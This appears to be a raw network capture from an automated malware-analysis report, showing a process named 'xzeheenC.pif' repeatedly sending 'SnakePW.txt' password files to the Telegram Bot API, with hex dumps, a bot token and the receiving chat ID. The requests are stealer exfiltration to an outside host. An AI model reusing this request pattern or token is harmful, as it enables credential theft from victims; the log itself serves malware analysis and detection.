                                                                                                                      2024-12-18 15:18:15 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 38 39 31 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 30 39 35 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418916,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535095,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      55192.168.2.549983149.154.167.2204436656C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:18:15 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd229ac9c02cfe
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:18:15 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 32 39 61 63 39 63 30 32 63 66 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 36 3a 34 38 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd229ac9c02cfeContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:16:48Client IP:
                                                                                                                      2024-12-18 15:18:16 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:15 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:18:16 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 38 39 31 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 30 39 35 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418918,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535095,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      56192.168.2.549984149.154.167.220443432C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:18:15 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd218608facd63
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:18:15 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 31 38 36 30 38 66 61 63 64 36 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 37 3a 30 30 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd218608facd63Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:00Client IP:
                                                                                                                      2024-12-18 15:18:16 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:15 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:18:16 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 38 39 31 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 30 39 35 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418919,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535095,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      57192.168.2.549989149.154.167.2204432140C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:18:17 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd2189f0cb04ca
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:18:17 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 31 38 39 66 30 63 62 30 34 63 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 37 3a 30 35 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd2189f0cb04caContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:05Client IP:
                                                                                                                      2024-12-18 15:18:17 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:17 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:18:17 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 38 39 32 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 30 39 37 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418921,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535097,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      58192.168.2.549990149.154.167.2204436656C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:18:17 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd22de6d3ef3c7
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:18:17 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 32 64 65 36 64 33 65 66 33 63 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 36 3a 34 38 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd22de6d3ef3c7Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:16:48Client IP:
                                                                                                                      2024-12-18 15:18:18 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:17 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:18:18 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 38 39 32 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 30 39 37 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418923,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535097,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      59192.168.2.549991149.154.167.220443432C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:18:17 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd21a9f558bff4
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:18:17 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 31 61 39 66 35 35 38 62 66 66 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 37 3a 30 30 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd21a9f558bff4Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:00Client IP:
                                                                                                                      2024-12-18 15:18:18 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:17 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:18:18 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 38 39 32 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 30 39 37 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418924,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535097,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      60192.168.2.549997149.154.167.2204432140C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:18:19 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd21acbc242eed
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:18:19 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 31 61 63 62 63 32 34 32 65 65 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 37 3a 30 35 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd21acbc242eedContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:05Client IP:
                                                                                                                      2024-12-18 15:18:19 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:19 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:18:19 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 38 39 32 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 30 39 39 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418928,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535099,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      61192.168.2.549998149.154.167.2204436656C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:18:19 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd2321d33b2b75
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:18:19 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 33 32 31 64 33 33 62 32 62 37 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 36 3a 34 38 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd2321d33b2b75Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:16:48Client IP:
                                                                                                                      2024-12-18 15:18:20 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:19 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
